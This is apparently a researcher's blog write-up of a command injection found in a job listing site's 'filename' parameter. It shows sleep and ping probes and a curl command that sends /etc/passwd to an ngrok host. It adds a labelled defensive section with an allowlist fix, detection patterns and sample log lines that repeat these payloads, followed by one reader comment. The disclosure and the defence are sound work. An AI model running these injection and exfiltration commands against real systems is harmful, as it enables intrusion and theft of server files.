
Command Injection PoC

So back in December 2017 I found a command injection vulnerability in a job listing site. Here is a simple proof of concept. The vulnerable parameter is `filename`.

I tested with the command `sleep 5` and the response was delayed for 5–6 seconds (6.113 millis). See the delay in the right corner below.


I double-checked with `sleep 10` just to make sure, and the difference was clear: this time the response was delayed for 10–11 seconds (11.137 millis). See the delay in the right corner below.


I tried pinging my server with `ping -c 5 ` and ran `tcpdump -i -n icmp` on my server to watch for incoming ICMP packets. That ping command sends 5 ICMP packets to my server's IP address.


Sorry for the redactions, but you can see I received 5 incoming ICMP packets. My server IP address is 5.000.000.105 and the incoming ICMP packets are from 000.000.39.169. Now I know the filename parameter is vulnerable to command injection.

I did another test using ngrok. I ran `./ngrok http 80` on my localhost and executed `curl blablabla.ngrok.io` through the vulnerable parameter.


Now see the response in the ngrok web interface (http://127.0.0.1:4040). I got an incoming request from IP address 000.000.39.169, the same IP address as in the ICMP requests above.


Now I can read files on the vulnerable server and send them to my ngrok address using `curl -F shl=@/etc/passwd blablabla.ngrok.io`. That command sends a POST request to blablabla.ngrok.io with an `shl` parameter containing the contents of /etc/passwd.


And the result: the vulnerable server sent its /etc/passwd to my ngrok address, again from IP address 000.000.39.169.
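The defender's side of the same finding, as an added example that is not part of the original post: the server was splicing the raw `filename` value into a shell command, so the fix is an allowlist check plus an argv list with no shell, and the probes used above (`sleep`, `ping -c`, `curl -F`) leave recognisable traces in the web server's access log. The allowlist, the detection patterns, the `/download` endpoint and the sample log lines are all constructed assumptions, not taken from the real site.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed allowlist for the filename parameter: a plain name, no path or shell syntax.
SAFE_FILENAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")
# Constructed detection patterns mirroring the probes in the post: shell separators,
# a time delay (sleep) and out-of-band callbacks (ICMP via ping, HTTP via curl/wget).
INJECTION_PATTERNS = {
    "shell_metachar": re.compile(r"[;&|`]|\$\("),
    "time_probe": re.compile(r"\bsleep\s+\d+"),
    "oob_icmp": re.compile(r"\bping\b.*\s-c\s*\d+"),
    "oob_http": re.compile(r"\b(?:curl|wget)\b"),
}
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def is_safe_filename(filename: str) -> bool:
    return SAFE_FILENAME.fullmatch(filename) is not None

def hardened_argv(filename: str) -> list[str]:
    """Fix for the bug: the injectable server splices the raw parameter into a shell
    string, so 'report.pdf;sleep 5' becomes two commands. Here the value must pass the
    allowlist and is then passed as an argv list, e.g. subprocess.run(argv, check=True)."""
    if not is_safe_filename(filename):
        raise ValueError(f"rejected filename parameter: {filename!r}")
    return ["head", "-n", "5", f"uploads/{filename}"]

def classify_filename(value: str) -> list[str]:
    return [name for name, pat in INJECTION_PATTERNS.items() if pat.search(value)]

def scan_access_log(lines: list[str]) -> list[tuple[int, str, list[str]]]:
    """Flag requests whose filename parameter looks like an injection attempt."""
    hits = []
    for idx, line in enumerate(lines):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        # parse_qs percent-decodes and turns '+' into spaces, restoring the payload.
        value = parse_qs(urlsplit(m.group(1)).query).get("filename", [""])[0]
        findings = classify_filename(value)
        if findings:
            hits.append((idx, value, findings))
    return hits

# Constructed sample access-log lines (documentation-range IPs), not from the real site.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Dec/2017:10:01:02 +0000] "GET /download?filename=report.pdf HTTP/1.1" 200 512',
    '203.0.113.7 - - [05/Dec/2017:10:01:09 +0000] "GET /download?filename=report.pdf%3Bsleep+5 HTTP/1.1" 200 512',
    '203.0.113.7 - - [05/Dec/2017:10:02:30 +0000] "GET /download?filename=x%7Cping+-c+5+198.51.100.9 HTTP/1.1" 200 12',
    '203.0.113.7 - - [05/Dec/2017:10:03:01 +0000] "GET /download?filename=x%3Bcurl+-F+shl%3D%40%2Fetc%2Fpasswd+example.ngrok.io HTTP/1.1" 200 12',
]
```

Running `scan_access_log(SAMPLE_LOG)` flags lines 1 to 3 and leaves the legitimate `report.pdf` request alone; the time-delay probe is the one a WAF rarely blocks, which is why the log-side check matters.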


That's it! Happy hacking! :)

Comments

How is this an attack against the web architecture as opposed to an exploit of how Unix systems execute commands in shells? I'm currently in a security course and my professor explains the command injection attack as an OS exploit. Good video though.
